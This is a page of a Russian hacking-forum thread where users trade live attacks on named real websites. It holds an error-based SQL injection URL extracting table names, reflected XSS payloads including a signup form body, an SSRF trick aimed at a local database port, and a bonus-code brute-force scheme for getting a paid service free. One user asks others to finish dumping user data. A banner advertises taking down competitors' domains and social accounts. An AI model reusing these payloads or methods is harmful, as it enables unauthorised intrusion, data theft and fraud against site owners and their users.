Уязвимости SQLi, XSS и другие.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Уязвимости SQLi, XSS и другие.

Страница 24 из 35

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#231

15.04.2016, 22:26

kingbeef

Новичок

Регистрация: 08.04.2010

Сообщений: 1

С нами: 8469890

Репутация: 0

Цитата:

Сообщение от pw0ned

↑
alert()
фильтрует

https://site.ua/search/?searchString=alert()

Не фильтрует

#232

19.04.2016, 20:57

Octavian

Постоянный

Регистрация: 08.07.2015

Сообщений: 501

С нами: 5710646

Репутация: 24

http://vic.md/ro/notebook/list/all/...VERSION(),225,26,27,28,29,30,31,32+AND+(1)=(1

Дальше не смог вывести пользователеи.В ЛС кто сделает это )

#233

19.04.2016, 22:06

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

С нами: 5797046

Репутация: 40

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//vic.md/ro/notebook/list/all/1/producator_ID=9999)+and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database() limit 81,1),0x3a,floor(rand(0)*2))y from information_schema.tables  group by y ) x)+AND+(1)=(1 #[/COLOR][/COLOR]

AND+(1)=(1 это не нужно. Просто 9999 без )

#234

18.08.2016, 12:30

sander

Новичок

Регистрация: 14.06.2010

Сообщений: 0

С нами: 8374164

Репутация: 0

http://takky-shop.ru/images/img/log.txt

Открытый лог .

Reflected XSS

Код:

http://takky-shop.ru/category/">alert()

Код:

http://takky-shop.ru/search

в поисковике тоже XSS .

#235

22.08.2016, 19:16

waydam

Новичок

Регистрация: 14.08.2016

Сообщений: 1

С нами: 5130326

Репутация: 0

10minutemail.com

XSS

Еще интересная особенность, письмо дублируется много раз и каждый раз выскакивает алерт, не знаю с чем это связано)

#236

23.08.2016, 02:26

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

С нами: 5797046

Репутация: 40

Да эти ХСС даже уязвимостью назвать нельзя

https://www.crazymailing.com хсс

#237

22.09.2016, 10:56

SooLFaa

Постоянный

Регистрация: 17.03.2014

Сообщений: 530

С нами: 6398966

Репутация: 154

Солью не столь давний ресерч дабы разбавить скульки да хсски. Как отправлять бесплатно открытки на сервисе voicecards.ru?

Логическая уязвимость на сервисе voicecard.ru, позволяет отправлять бесплатно голосовые открытки.

Баг находился в сервисе бонус кодов, то есть бонус код является номером. И при авторизации не через телефон, можно спокойно запустить JQuery скрипт, который с легкостью подберет его за секунды и отправит смс (в дальнейшем его приведу). Теперь детально:

Первое, авторизовываемся не через телефон, а средствами забытого пароля:

Вызываем форму отправки бонус кода, чтобы вызвать нужную нам форму для подбора.

Далее тупо перебираем скриптом в консоле

[CODE]
for (var i = 800000; i

#238

25.10.2016, 21:30

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

С нами: 5797046

Репутация: 40

http://newipnow.com/

в ПОЛЕ URL В ВОДИМ 127.0.0.1:3306

S.S.R.F.

#239

29.11.2016, 17:17

Octavian

Постоянный

Регистрация: 08.07.2015

Сообщений: 501

С нами: 5710646

Репутация: 24

#240

29.11.2016, 20:51

pw0ned

Участник форума

Регистрация: 08.01.2016

Сообщений: 118

С нами: 5445686

Репутация: 14

http://golden-bird.biz/signup

Код:

login=">alert(/xss/)&email=1@email.com&pass=password&repass=password

Страница 24 из 35

« Первая

Последняя »

Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход